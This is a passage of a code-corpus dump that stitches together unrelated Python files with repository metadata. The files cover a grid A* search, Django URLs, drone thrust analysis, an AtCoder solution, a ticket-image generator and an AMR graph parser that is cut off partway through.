if integers[midpoint] < integers[midpoint - 1]:
return find_peak(integers[:midpoint])
if integers[midpoint] < integers[midpoint + 1]:
return find_peak(integers[midpoint + 1:])
return integers[midpoint]
| [
"pdeyoreo@gmail.com"
] | pdeyoreo@gmail.com |
366291ef3ecbe926e4c8e8c393691c15ae25005f | d599925c5eb90d03daa29bd6c749876a55380f52 | /main.py | 7f102609bc215a0af29755cfd10d679edd03911a | [] | no_license | jmelton22/informed_search | 364e421599498235c14cb3df6d42c321c3317363 | 39a49836ce82691657d05ba83fb35b797da3cb02 | refs/heads/master | 2020-08-29T19:33:28.522944 | 2019-09-30T15:01:01 | 2019-09-30T15:01:01 | 218,148,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,054 | py | #!/usr/bin/env python3
import heapq
from node import Node
import grid as g
import math
from random import choice
def informed_search(grid, start, goal, greedy=True, manhattan=True):
"""
Handles initialization of data structures for grid search.
"""
visited, unexplored, path = [], [], []
heuristic = manhattan_distance if manhattan else euclidean_distance
print('Search algorithm:', 'Greedy search' if greedy else 'A*')
print('Heuristic function:', heuristic.__name__)
start_node = Node(start, None, 0, heuristic(start, goal), greedy)
return search(grid, start_node, goal, heuristic, unexplored, visited, greedy, path)
def search(grid, node, goal, heuristic, unexplored, visited, greedy, path):
"""
Recursive search. Exits when goal node has been reached or
when queue of unexplored nodes is empty.
:return: if goal node is reached, return a list of tuples with (coordinates, path cost)
back to the starting node and the number of nodes visited in search.
if queue is empty without reaching goal node, return None and the number of nodes visited in search.
"""
visited.append(node)
if node.value == goal:
return set_path(node, path), len(visited)
else:
# Add valid neighboring nodes to unexplored queue
expand_node(grid, node, goal, heuristic, visited, unexplored, greedy)
if not unexplored:
return None, len(visited)
else:
# Search through next node in queue
return search(grid, heapq.heappop(unexplored), goal, heuristic, unexplored, visited, greedy, path)
def step_cost(grid, pt):
return grid[pt[0]][pt[1]]
def manhattan_distance(pt1, pt2):
return sum([abs(d1 - d2) for d1, d2 in zip(pt1, pt2)])
def euclidean_distance(pt1, pt2):
return math.sqrt(sum([(d1 - d2) ** 2 for d1, d2 in zip(pt1, pt2)]))
def set_path(node, path):
"""
Recursive function to determine the path from the goal node to starting node
by traversing the parent nodes until reaching the start node.
"""
path.append((node.value, node.g))
if node.parent is None:
return path
else:
return set_path(node.parent, path)
def expand_node(grid, node, goal, heuristic, visited, unexplored, greedy):
"""
Given a node, push its valid neighboring nodes to the unexplored queue.
Nodes are valid if:
- They have a non-zero grid value, have not already been visited, and are not already in the queue
(Only relevant for A*)
- Or they have the same coordinates as a node in queue but with a lower path cost
- In which case, the node with higher path cost is removed from queue and
the new node is pushed to the queue
"""
def in_unexplored(coord, q):
return coord in [x.value for x in q]
def in_visited(coord, l):
return coord in [x.value for x in l]
for n in node.get_neighbors(grid):
# Path cost of neighbor is the path cost to the parent + step cost to new coord
path_cost = node.g + step_cost(grid, n)
temp_node = Node(n, node, path_cost, heuristic(n, goal), greedy)
if in_unexplored(n, unexplored):
for duplicate in [x for x in unexplored if x.value == n and x.priority > temp_node.priority]:
unexplored.remove(duplicate)
heapq.heappush(unexplored, temp_node)
elif not in_visited(n, visited):
heapq.heappush(unexplored, temp_node)
def get_user_coords(grid, text):
"""
Get and validate user input for starting and goal coordinates.
"""
while True:
try:
coord = [int(x) for x in input('Enter a {} coordinate (r, c): '.format(text)).split(',')]
except ValueError:
print('Non-numeric coordinate entered')
continue
if step_cost(grid, coord) == 0:
print('Invalid coordinate on grid')
else:
return coord
def main():
grid = g.read_grid('grid.txt')
# grid = g.make_grid(20, 20)
g.print_grid(grid)
print()
start = get_user_coords(grid, 'start')
end = get_user_coords(grid, 'goal')
print('-' * 15)
# Randomly toggles search and heuristic methods
path, num_states = informed_search(grid, start, end,
greedy=choice([True, False]),
manhattan=choice([True, False]))
print('Number of nodes expanded:', num_states)
print('-' * 15)
fname = 'path.txt'
if path is None:
print('No path found.')
else:
print('Path length: {} nodes'.format(len(path)))
print('Total cost:', path[0][1])
print()
g.output_grid(fname, grid, start, end, [x[0] for x in path])
print()
print('Path: coordinate - cost')
print('\n'.join('\t{} - {:02d}'.format(coord, cost) for coord, cost in path[::-1]))
if __name__ == '__main__':
main()
| [
"jmelton22@gmail.com"
] | jmelton22@gmail.com |
ea8ec717a90f286bfe885c6bc8ed63825d7f93cc | 4fcc4decad928d8df4fcfe2f519485acb38b112a | /users/urls.py | 418fffb9176b0de0db485338bf5a528497538b72 | [] | no_license | Timibreez/saveBlog | 04b7305b17ab329903b90ab3420260693a8d5a6c | e117d7b8281da146b39fb386a23cdec96365d7d3 | refs/heads/master | 2022-07-29T10:03:28.908881 | 2020-05-20T01:14:46 | 2020-05-20T01:14:46 | 265,412,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from django.urls import path, include
from . import views
app_name = 'users'
urlpatterns = [
path('signup', views.signup_user, name = 'signup'),
path('login', views.login_user, name = 'login'),
path('logout', views.logout_user, name = 'logout'),
] | [
"fftimi@gmail.com"
] | fftimi@gmail.com |
e6e21ac6bb4063b76eaa2241febd3f41d69cd517 | c6422f55de89cc1773ab637e199bc839a0149f11 | /simulators_investigation/system_id/misc/calculating_t2w.py | 509d25519e48f73535fc202a2214f4b4db55f9e5 | [] | no_license | maliesa96/quad_sim2multireal | 5e552a64c365844285554b51895fe7c1c856a7cf | 5ae30cbb90d26a73184f745a1710b952e1d28c88 | refs/heads/master | 2020-12-26T23:19:50.100550 | 2020-03-07T21:10:33 | 2020-03-07T21:10:33 | 237,683,646 | 0 | 0 | null | 2020-02-01T21:57:59 | 2020-02-01T21:57:58 | null | UTF-8 | Python | false | false | 5,383 | py | #!/usr/bin/env python
import argparse
import numpy as np
import os
import sys
from flight_data_reader import reader
import matplotlib.pyplot as plt
from scipy import signal
def normalize(v):
norm = np.linalg.norm(v)
if norm == 0:
return v
return v / norm
def scale_action(action):
"""
scaled and clip the actions and use as training data
"""
action_dim = action.shape[1]
action_low = np.zeros(action_dim)
action_high = np.ones(action_dim)
action_scale = 0.5
action_bias = 1.0
## scaled and clip the action and use as training data
action = action_scale * (action + action_bias)
action = np.clip(action, a_min=action_low, a_max=action_high)
return action
def load_data(real_flight_file):
assert os.path.isfile(real_flight_file) == True, "data path doesn't exist"
log_data = reader.decode(real_flight_file, plot=False)
"""
clean the data such that
it only contains valid flight data
"""
## eliminate ground effect and clean data
z_threshold = 0.05
start = end = 0
found_start = False
for z in log_data['ctrltarget.z']:
if z > z_threshold and found_start == False:
found_start = True
if found_start == False:
start += 1
if z <= z_threshold and found_start == True:
break
end += 1
for key in log_data:
log_data[key] = log_data[key][start:end]
b, a = signal.butter(8, 0.01)
## linear velocity
abs_vx, abs_vy, abs_vz = log_data['stateEstimate.vx'], log_data['stateEstimate.vy'], log_data['stateEstimate.vz']
## orientation
qx, qy, qz, qw = log_data['stateEstimate.qx'], log_data['stateEstimate.qy'], log_data['stateEstimate.qz'], log_data['stateEstimate.qw']
## neural network raw output
thrust0, thrust1, thrust2, thrust3 = log_data['ctrlNN.out0'], log_data['ctrlNN.out1'], log_data['ctrlNN.out2'], log_data['ctrlNN.out3']
abs_v = np.column_stack([abs_vx, abs_vy, abs_vz])
actions = scale_action(np.column_stack([thrust0, thrust1, thrust2, thrust3]))
rots = quat2R(np.column_stack([qx, qy, qz, qw]))
return signal.filtfilt(b, a, abs_v, axis=0, padlen=150), signal.filtfilt(b, a, actions, axis=0, padlen=150) ##, rots
def load_data_sim(real_flight_file):
assert os.path.isfile(real_flight_file) == True, "data path doesn't exist"
TIME = 0
X, Y, Z = 1, 2, 3
Roll, Pitch, Yaw = 4, 5, 6
VX, VY, VZ = 7, 8, 9
Roll_rate, Pitch_rate, Yaw_rate = 10, 11, 12
Xt, Yt, Zt = 13, 14, 15
t0, t1, t2, t3 = 16, 17, 18, 19
# pred_obs_idx = [19+i for i in range(1, 2*len(out_comp), 2)]
log_data = np.loadtxt(real_flight_file, delimiter=',')
## eliminate ground effect and clean data
z_threshold = 0.1
start = end = 0
found_start = False
for z in log_data[:, Z]:
if z > z_threshold and found_start == False:
found_start = True
if found_start == False:
start += 1
if z <= z_threshold and found_start == True:
break
end += 1
log_data = log_data[start:end]
abs_v = log_data[:, VX:VZ+1]
actions = scale_action(log_data[:, t0:t3+1])
# rots = quat2R(log_data[:, QX:QW+1])
return abs_v, actions ##, rots
def plot_t2w(abs_v, actions):
assert abs_v.shape[0] == actions.shape[0], "mismatch length"
# assert abs_v.shape[0] == rots.shape[0], "mismatch length"
## the frequency at which the data was collected
dt = 0.01
GRAV = 9.81
## diagonsis
t2w_overtime = []
acceleration = []
action_sum = []
for i in range(1, abs_v.shape[0]):
## calculate the velocity change
v_diff = abs_v[i] - abs_v[i-1]
acc = v_diff / dt
## calculate the normalized thrust
action = np.sum(actions[i-1]) / 4
action_sum.append(action)
## rotation matrix
# rot = np.array(rots[i]).reshape((3, 3))
## acceleration after compensating for gravity
g = np.array([0., 0., -GRAV])
acc = acc - g
## total acceleration in the direction of the total thrust applied
acc = np.linalg.norm(acc)
acceleration.append(acc)
## assuming thrust and action is linearly related
t2w = acc / (action * GRAV)
t2w_overtime.append(t2w)
t2w_overtime = np.array(t2w_overtime)
print(np.mean(t2w_overtime, axis=0), np.std(t2w_overtime, axis=0))
plt.figure(0)
# plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), t2w_overtime[:, 0], label='t2w x')
# plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), t2w_overtime[:, 1], label='t2w y')
plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), t2w_overtime, label='t2w z')
plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), abs_v[1:,0], label='vx')
plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), abs_v[1:,1], label='vy')
plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), abs_v[1:,2], label='vz')
plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), action_sum, label='action sum')
plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), acceleration, label='acceleration')
plt.legend()
plt.show()
def main(argv):
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'real_flight_file',
type=str,
help='provide real flight data for training auxiliary dynamics'
)
parser.add_argument(
'--sim',
action='store_true',
help='if it is simulation data'
)
args = parser.parse_args()
if args.sim:
abs_v, actions = load_data_sim(args.real_flight_file)
else:
abs_v, actions = load_data(args.real_flight_file)
plot_t2w(abs_v, actions)
if __name__ == '__main__':
main(sys.argv) | [
"hanspal.pushpreet@gmail.com"
] | hanspal.pushpreet@gmail.com |
d3644245fbb6e118e01fef312221feff42ab5904 | 892c35f72f46f145c3f3860c1c29f1f4503ef9a6 | /solid/management/commands/solid_utils.py | bf76df8227f11afddcb1cdf4ef3e92ed3ccaa1ab | [] | no_license | pymmrd/tuangou | aaa2b857e352f75f2ba0aa024d2880a6adac21a8 | 8f6a35dde214e809cdd6cbfebd8d913bafd68fb2 | refs/heads/master | 2021-01-10T20:31:55.238764 | 2013-11-13T13:53:53 | 2013-11-13T13:53:53 | 7,911,285 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | import os
from django.conf import settings
def gen_dest_tmpl(html, tmpl, flag=None):
tmpl = tmpl.replace('dy_tags', 'tags')
sub_dir, filename = tmpl.rsplit('/', 1)
if flag:
filename = flag
tmpl_dir = os.path.join(settings.TEMPLATE_DIRS[0], sub_dir)
if not os.path.exists(tmpl_dir):
os.makedirs(tmpl_dir)
with open(os.path.join(tmpl_dir, filename), 'w') as f:
f.write(html)
| [
"zg163@zg163-Lenovo-IdeaPad-Y470.(none)"
] | zg163@zg163-Lenovo-IdeaPad-Y470.(none) |
ecd943fe32764b5d003c08d7e59fdf912e1f3c46 | fc943d383a566a7d0970829142f7c0bc2f69038c | /Digit.py | 36fc00afddf67dc7e1fe23ac93f8439d59a69f7b | [] | no_license | shivangisrivastava0408/Hackerearth_accepted_solutions | 52f84a97fa36c5d003e3563811d065e515bb4e2f | d8edb5346dd69f1090ea5af7098faefde4fdde83 | refs/heads/master | 2020-04-04T09:26:56.432975 | 2019-03-17T14:35:17 | 2019-03-17T14:35:17 | 155,818,466 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | n=raw_input()
p=0
for w in n:
p+=1
print p
| [
"noreply@github.com"
] | shivangisrivastava0408.noreply@github.com |
267c53035abe4b5d31f3e45735b277a207985313 | 83734cb05c768686b45aa1459e3d220151d60b7c | /options/base_options.py | 78e8d225ee928ac718e2d4a0f735e804e1975028 | [] | no_license | guofenggitlearning/RED-Net | b8924d477ec0e05a4da11b2b7c24e2ca0b3fae81 | e7d6159794e2f3563f1d764328eafdc0df0dc4f0 | refs/heads/master | 2020-08-15T09:50:29.447425 | 2018-07-19T03:01:04 | 2018-07-19T03:01:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,351 | py | # Xi Peng, May 2017
import argparse
import os
from utils import util
class BaseOptions():
def __init__(self):
self.parser = argparse.ArgumentParser()
self.initialized = False
def initialize(self):
self.parser.add_argument('--data_dir', type=str, default='./dataset',
help='training data or listfile path')
self.parser.add_argument('--checkpoint_dir',type=str, default='./checkpoint',
help='checkpoints are saved here')
self.parser.add_argument('--nThreads', type=int, default=4,
help='number of data loading threads')
self.parser.add_argument('--ifValidate', type=bool, default=True,
help='evaluate model on validation set')
self.parser.add_argument('--use_visdom', type=bool, default=True,
help='use visdom to display')
self.parser.add_argument('--use_html', type=bool, default=False,
help='use html to store images')
self.parser.add_argument('--display_winsize', type=int, default=256,
help='display window size') ##TO DO
self.initialized = True
def parse(self):
if not self.initialized:
self.initialize()
self.opt = self.parser.parse_args()
self.opt.isTrain = self.isTrain # train or test
self.opt.name = self.name # experiment name
#str_ids = self.opt.gpu_ids.split(',')
#self.opt.gpu_ids = []
#for str_id in str_ids:
# id = int(str_id)
# if id >= 0:
# self.opt.gpu_ids.append(id)
args = vars(self.opt)
print('------------ Options -------------')
for k, v in sorted(args.items()):
print('%s: %s' % (str(k), str(v)))
print('-------------- End ----------------')
# save to the disk
expr_dir = os.path.join(self.opt.checkpoint_dir, self.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('------------ Options -------------\n')
for k, v in sorted(args.items()):
opt_file.write('%s: %s\n' % (str(k), str(v)))
opt_file.write('-------------- End ----------------\n')
return self.opt
| [
"peter.pen.ac@gmail.com"
] | peter.pen.ac@gmail.com |
e3ae61193e0a2880e6eb878f379a07f656630931 | a722faf9fb50c794555861bb4858c3ed8a7a25f3 | /contest/atcoder/abc095/D/main.py | 7f2f0044567a122b8832c3dbfb0972c08712b132 | [] | no_license | ar90n/lab | 31e5d2c320de5618bc37572011596fee8923255d | 6d035e12f743e9ba984e79bfe660967b9ca8716b | refs/heads/main | 2023-07-25T17:29:57.960915 | 2023-07-22T12:08:18 | 2023-07-22T12:08:18 | 77,883,405 | 4 | 0 | null | 2023-07-17T08:45:14 | 2017-01-03T04:15:49 | Jupyter Notebook | UTF-8 | Python | false | false | 1,428 | py | #!/usr/bin/env python3
import sys
from collections.abc import Iterable
from math import *
from itertools import *
from collections import *
from functools import *
from operator import *
try:
from math import gcd
except Exception:
from fractions import gcd
def solve(N: int, C: int, x: "List[int]", v: "List[int]"):
x = [0] + x
v = [0] + v
mx_r = [0]
for xx, acc in zip(x[1:], accumulate(v[1:], add)):
mx_r.append(max(acc - xx, mx_r[-1]))
mx_l = [0]
for xx, cal in zip(reversed(x), accumulate(reversed(v), add)):
mx_l.append(max(cal - (C - xx), mx_l[-1]))
mx_l.reverse()
ans = 0
for i in range(N+1):
ans = max(mx_r[i], mx_r[i] - x[i] + mx_l[i+1], ans)
if i != 0:
ans = max(mx_l[i], mx_l[i] - (C - x[i]) + mx_r[i-1], ans)
return ans
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
C = int(next(tokens)) # type: int
x = [int()] * (N) # type: "List[int]"
v = [int()] * (N) # type: "List[int]"
for i in range(N):
x[i] = int(next(tokens))
v[i] = int(next(tokens))
result = solve(N, C, x, v)
if isinstance(result, Iterable):
result = '\n'.join([str(v) for v in result])
print(result)
if __name__ == '__main__':
main()
| [
"argon.argon.argon@gmail.com"
] | argon.argon.argon@gmail.com |
0b576136cc62e8b69cc2c0e9b5bd5a1105ee8654 | d6d754aecc1f1dde8a168bdcd1ff85916c9b2ea5 | /backend/venv/bin/pip3.7 | 83c466b4c03cb4082166cfc8be1009c33d21cdf2 | [] | no_license | roxywilcox/CS338-COVID-19-Project-1-Team-1 | 2b30dd11211c5f5685ad9ed60e1e18d214d997cd | 7a2f23770b35ca34d5ea9598cfbd7741fb3a6928 | refs/heads/master | 2022-10-06T12:46:39.514553 | 2020-06-09T21:44:55 | 2020-06-09T21:44:55 | 261,042,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | 7 | #!/Users/aniface/northwestern/CS338/covid/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')()
)
| [
"stella.lee.lzr@gmail.com"
] | stella.lee.lzr@gmail.com |
848c1caad27107184ca3491a4c986e2c04f6352c | 82542073a6b9fa75e8c6e2c94bdea5b10edfda75 | /Only_Python/chatbot/generate_ticket.py | 563e1ff775e2d975ce4f3802e43d77a0c63bcd95 | [] | no_license | ilya-jurawlew/my_projects | a19d8f723588e77ab35fd3e2a8ba60d1f37a2036 | bdf9e6a47587e61fd98eaa94def868430023c31d | refs/heads/master | 2023-08-19T21:48:30.203953 | 2021-10-27T11:55:24 | 2021-10-27T11:55:24 | 366,669,874 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | import os
from io import BytesIO
import requests
from PIL import Image, ImageDraw, ImageFont
from cairosvg import svg2png
TEMPLATE_PATH = os.path.abspath('files/ticket_base.png/')
FONT_PATH = os.path.abspath('files/Roboto-Regular.ttf/')
FONT_SIZE = 20
BLACK = (0, 0, 0, 225)
NAME_OFFSET = (270, 125)
EMAIL_OFFSET = (280, 150)
AVATAR_SIZE = 150
AVATAR_OFFSET = (50, 100)
def generate_ticket(name, email):
with Image.open(TEMPLATE_PATH).convert("RGBA") as base:
font = ImageFont.truetype(FONT_PATH, FONT_SIZE)
draw = ImageDraw.Draw(base)
draw.text(NAME_OFFSET, name, font=font, fill=BLACK)
draw.text(EMAIL_OFFSET, email, font=font, fill=BLACK)
response = requests.get(url=f'https://avatars.dicebear.com/api/male/{AVATAR_SIZE}/{email}.svg/')
if response.status_code == 200:
avatar_file = BytesIO()
avatar_file_like = svg2png(bytestring=response.content, write_to=avatar_file)
avatar = Image.open(avatar_file_like)
base.paste(avatar, AVATAR_OFFSET)
temp_file = BytesIO()
base.save(temp_file, 'png')
temp_file.seek(0)
return temp_file
| [
"jurawlew@mail.ru"
] | jurawlew@mail.ru |
656ab23cb73ce77eabb15f38db88a3db0ed76209 | 7ad0e68255b0ec053a5a16fa6e6c8bee06d89902 | /amr_seq2seq/utils/amr.py | f1302a79495eddd06bb746df9e4ab25b174f78ec | [
"MIT"
] | permissive | YerevaNN/amr_seq2seq | e4333b6e9a3ea3fcdfe0a9d6233c465c8da06be4 | 7c76def8e26e06d4a8a279b5db7ae404465ec9b0 | refs/heads/master | 2020-04-24T15:49:42.193589 | 2019-02-22T15:42:16 | 2019-02-22T15:42:16 | 172,084,003 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,770 | py | # -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
AMR (Abstract Meaning Representation) structure
For detailed description of AMR, see http://www.isi.edu/natural-language/amr/a.pdf
"""
from collections import defaultdict
import sys
import logging
logger = logging.getLogger('amr_postprocessing')
# change this if needed
ERROR_LOG = sys.stderr
# change this if needed
DEBUG_LOG = sys.stderr
class AMR(object):
"""
AMR is a rooted, labeled graph to represent semantics.
This class has the following members:
nodes: list of node in the graph. Its ith element is the name of the ith node. For example, a node name
could be "a1", "b", "g2", .etc
node_values: list of node labels (values) of the graph. Its ith element is the value associated with node i in
nodes list. In AMR, such value is usually a semantic concept (e.g. "boy", "want-01")
root: root node name
relations: list of edges connecting two nodes in the graph. Each entry is a link between two nodes, i.e. a triple
<relation name, node1 name, node 2 name>. In AMR, such link denotes the relation between two semantic
concepts. For example, "arg0" means that one of the concepts is the 0th argument of the other.
attributes: list of edges connecting a node to an attribute name and its value. For example, if the polarity of
some node is negative, there should be an edge connecting this node and "-". A triple < attribute name,
node name, attribute value> is used to represent such attribute. It can also be viewed as a relation.
"""
def __init__(self, node_list=None, node_value_list=None, relation_list=None, attribute_list=None):
"""
node_list: names of nodes in AMR graph, e.g. "a11", "n"
node_value_list: values of nodes in AMR graph, e.g. "group" for a node named "g"
relation_list: list of relations between two nodes
attribute_list: list of attributes (links between one node and one constant value)
"""
# initialize AMR graph nodes using list of nodes name
# root, by default, is the first in var_list
if node_list is None:
self.nodes = []
self.root = None
else:
self.nodes = node_list[:]
if len(node_list) != 0:
self.root = node_list[0]
else:
self.root = None
if node_value_list is None:
self.node_values = []
else:
self.node_values = node_value_list[:]
if relation_list is None:
self.relations = []
else:
self.relations = relation_list[:]
if attribute_list is None:
self.attributes = []
else:
self.attributes = attribute_list[:]
def rename_node(self, prefix):
"""
Rename AMR graph nodes to prefix + node_index to avoid nodes with the same name in two different AMRs.
"""
node_map_dict = {}
# map each node to its new name (e.g. "a1")
for i in range(0, len(self.nodes)):
node_map_dict[self.nodes[i]] = prefix + str(i)
# update node name
for i, v in enumerate(self.nodes):
self.nodes[i] = node_map_dict[v]
# update node name in relations
for i, d in enumerate(self.relations):
new_dict = {}
for k, v in d.items():
new_dict[node_map_dict[k]] = v
self.relations[i] = new_dict
def get_triples(self):
"""
Get the triples in three lists.
instance_triple: a triple representing an instance. E.g. instance(w, want-01)
attribute triple: relation of attributes, e.g. polarity(w, - )
and relation triple, e.g. arg0 (w, b)
"""
instance_triple = []
relation_triple = []
attribute_triple = []
for i in range(len(self.nodes)):
instance_triple.append(("instance", self.nodes[i], self.node_values[i]))
# k is the other node this node has relation with
# v is relation name
for k, v in self.relations[i].items():
relation_triple.append((v, self.nodes[i], k))
# k2 is the attribute name
# v2 is the attribute value
for k2, v2 in self.attributes[i].items():
attribute_triple.append((k2, self.nodes[i], v2))
return instance_triple, attribute_triple, relation_triple
def get_triples2(self):
"""
Get the triples in two lists:
instance_triple: a triple representing an instance. E.g. instance(w, want-01)
relation_triple: a triple representing all relations. E.g arg0 (w, b) or E.g. polarity(w, - )
Note that we do not differentiate between attribute triple and relation triple. Both are considered as relation
triples.
All triples are represented by (triple_type, argument 1 of the triple, argument 2 of the triple)
"""
instance_triple = []
relation_triple = []
for i in range(len(self.nodes)):
# an instance triple is instance(node name, node value).
# For example, instance(b, boy).
instance_triple.append(("instance", self.nodes[i], self.node_values[i]))
# k is the other node this node has relation with
# v is relation name
for k, v in self.relations[i].items():
relation_triple.append((v, self.nodes[i], k))
# k2 is the attribute name
# v2 is the attribute value
for k2, v2 in self.attributes[i].items():
relation_triple.append((k2, self.nodes[i], v2))
return instance_triple, relation_triple
def __str__(self):
"""
Generate AMR string for better readability
"""
lines = []
for i in range(len(self.nodes)):
lines.append("Node " + str(i) + " " + self.nodes[i])
lines.append("Value: " + self.node_values[i])
lines.append("Relations:")
for k, v in self.relations[i].items():
lines.append("Node " + k + " via " + v)
for k2, v2 in self.attributes[i].items():
lines.append("Attribute: " + k2 + " value " + v2)
return "\n".join(lines)
def __repr__(self):
return self.__str__()
def output_amr(self):
"""
Output AMR string
"""
logger.info(self.__str__())
@staticmethod
def parse_AMR_line(line):
"""
Parse a AMR from line representation to an AMR object.
This parsing algorithm scans the line once and process each character, in a shift-reduce style.
"""
# Current state. It denotes the last significant symbol encountered. 1 for (, 2 for :, 3 for /,
# and 0 for start state or ')'
# Last significant symbol is ( --- start processing node name
# Last significant symbol is : --- start processing relation name
# Last significant symbol is / --- start processing node value (concept name)
# Last significant symbol is ) --- current node processing is complete
# Note that if these symbols are inside parenthesis, they are not significant symbols.
state = 0
# node stack for parsing
stack = []
# current not-yet-reduced character sequence
cur_charseq = []
# key: node name value: node value
node_dict = {}
# node name list (order: occurrence of the node)
node_name_list = []
# key: node name: value: list of (relation name, the other node name)
node_relation_dict1 = defaultdict(list)
# key: node name, value: list of (attribute name, const value) or (relation name, unseen node name)
node_relation_dict2 = defaultdict(list)
# current relation name
cur_relation_name = ""
# having unmatched quote string
in_quote = False
for i, c in enumerate(line.strip()):
if c == " ":
# allow space in relation name
if state == 2:
cur_charseq.append(c)
continue
if c == "\"":
# flip in_quote value when a quote symbol is encountered
# insert placeholder if in_quote from last symbol
if in_quote:
cur_charseq.append('_')
in_quote = not in_quote
elif c == "(":
# not significant symbol if inside quote
if in_quote:
cur_charseq.append(c)
continue
# get the attribute name
# e.g :arg0 (x ...
# at this point we get "arg0"
if state == 2:
# in this state, current relation name should be empty
if cur_relation_name != "":
logger.error("Format error when processing ", line[0:i + 1])
return None
# update current relation name for future use
cur_relation_name = "".join(cur_charseq).strip()
cur_charseq[:] = []
state = 1
elif c == ":":
# not significant symbol if inside quote
if in_quote:
cur_charseq.append(c)
continue
# Last significant symbol is "/". Now we encounter ":"
# Example:
# :OR (o2 / *OR*
# :mod (o3 / official)
# gets node value "*OR*" at this point
if state == 3:
node_value = "".join(cur_charseq)
# clear current char sequence
cur_charseq[:] = []
# pop node name ("o2" in the above example)
cur_node_name = stack[-1]
# update node name/value map
node_dict[cur_node_name] = node_value
# Last significant symbol is ":". Now we encounter ":"
# Example:
# :op1 w :quant 30
# or :day 14 :month 3
# the problem is that we cannot decide if node value is attribute value (constant)
# or node value (variable) at this moment
elif state == 2:
temp_attr_value = "".join(cur_charseq)
cur_charseq[:] = []
parts = temp_attr_value.split()
if len(parts) < 2:
logger.error("Error in processing; part len < 2", line[0:i + 1])
return None
# For the above example, node name is "op1", and node value is "w"
# Note that this node name might not be encountered before
relation_name = parts[0].strip()
relation_value = parts[1].strip()
# We need to link upper level node to the current
# top of stack is upper level node
if len(stack) == 0:
logger.error("Error in processing", line[:i], relation_name, relation_value)
return None
# if we have not seen this node name before
if relation_value not in node_dict:
node_relation_dict2[stack[-1]].append((relation_name, relation_value))
else:
node_relation_dict1[stack[-1]].append((relation_name, relation_value))
state = 2
elif c == "/":
if in_quote:
cur_charseq.append(c)
continue
# Last significant symbol is "(". Now we encounter "/"
# Example:
# (d / default-01
# get "d" here
if state == 1:
node_name = "".join(cur_charseq)
cur_charseq[:] = []
# if this node name is already in node_dict, it is duplicate
if node_name in node_dict:
logger.error("Duplicate node name ", node_name, " in parsing AMR")
return None
# push the node name to stack
stack.append(node_name)
# add it to node name list
node_name_list.append(node_name)
# if this node is part of the relation
# Example:
# :arg1 (n / nation)
# cur_relation_name is arg1
# node name is n
# we have a relation arg1(upper level node, n)
if cur_relation_name != "":
# if relation name ends with "-of", e.g."arg0-of",
# it is reverse of some relation. For example, if a is "arg0-of" b,
# we can also say b is "arg0" a.
# If the relation name ends with "-of", we store the reverse relation.
if not cur_relation_name.endswith("-of"):
# stack[-2] is upper_level node we encountered, as we just add node_name to stack
node_relation_dict1[stack[-2]].append((cur_relation_name, node_name))
else:
# cur_relation_name[:-3] is to delete "-of"
node_relation_dict1[node_name].append((cur_relation_name[:-3], stack[-2]))
# clear current_relation_name
cur_relation_name = ""
else:
# error if in other state
logger.error("Error in parsing AMR", line[0:i + 1])
return None
state = 3
elif c == ")":
if in_quote:
cur_charseq.append(c)
continue
# stack should be non-empty to find upper level node
if len(stack) == 0:
logger.error("Unmatched parenthesis at position", i, "in processing", line[0:i + 1])
return None
# Last significant symbol is ":". Now we encounter ")"
# Example:
# :op2 "Brown") or :op2 w)
# get \"Brown\" or w here
if state == 2:
temp_attr_value = "".join(cur_charseq)
cur_charseq[:] = []
parts = temp_attr_value.split()
if len(parts) < 2:
logger.error("Error processing", line[:i + 1], temp_attr_value)
return None
relation_name = parts[0].strip()
relation_value = parts[1].strip()
# store reverse of the relation
# we are sure relation_value is a node here, as "-of" relation is only between two nodes
if relation_name.endswith("-of"):
node_relation_dict1[relation_value].append((relation_name[:-3], stack[-1]))
# attribute value not seen before
# Note that it might be a constant attribute value, or an unseen node
# process this after we have seen all the node names
elif relation_value not in node_dict:
node_relation_dict2[stack[-1]].append((relation_name, relation_value))
else:
node_relation_dict1[stack[-1]].append((relation_name, relation_value))
# Last significant symbol is "/". Now we encounter ")"
# Example:
# :arg1 (n / nation)
# we get "nation" here
elif state == 3:
node_value = "".join(cur_charseq)
cur_charseq[:] = []
cur_node_name = stack[-1]
# map node name to its value
node_dict[cur_node_name] = node_value
# pop from stack, as the current node has been processed
stack.pop()
cur_relation_name = ""
state = 0
else:
# not significant symbols, so we just shift.
cur_charseq.append(c)
# create data structures to initialize an AMR
node_value_list = []
relation_list = []
attribute_list = []
for v in node_name_list:
if v not in node_dict:
logger.error("Error: Node name not found {v}")
return None
else:
node_value_list.append(node_dict[v])
# build relation map and attribute map for this node
relation_dict = {}
attribute_dict = {}
if v in node_relation_dict1:
for v1 in node_relation_dict1[v]:
relation_dict[v1[1]] = v1[0]
if v in node_relation_dict2:
for v2 in node_relation_dict2[v]:
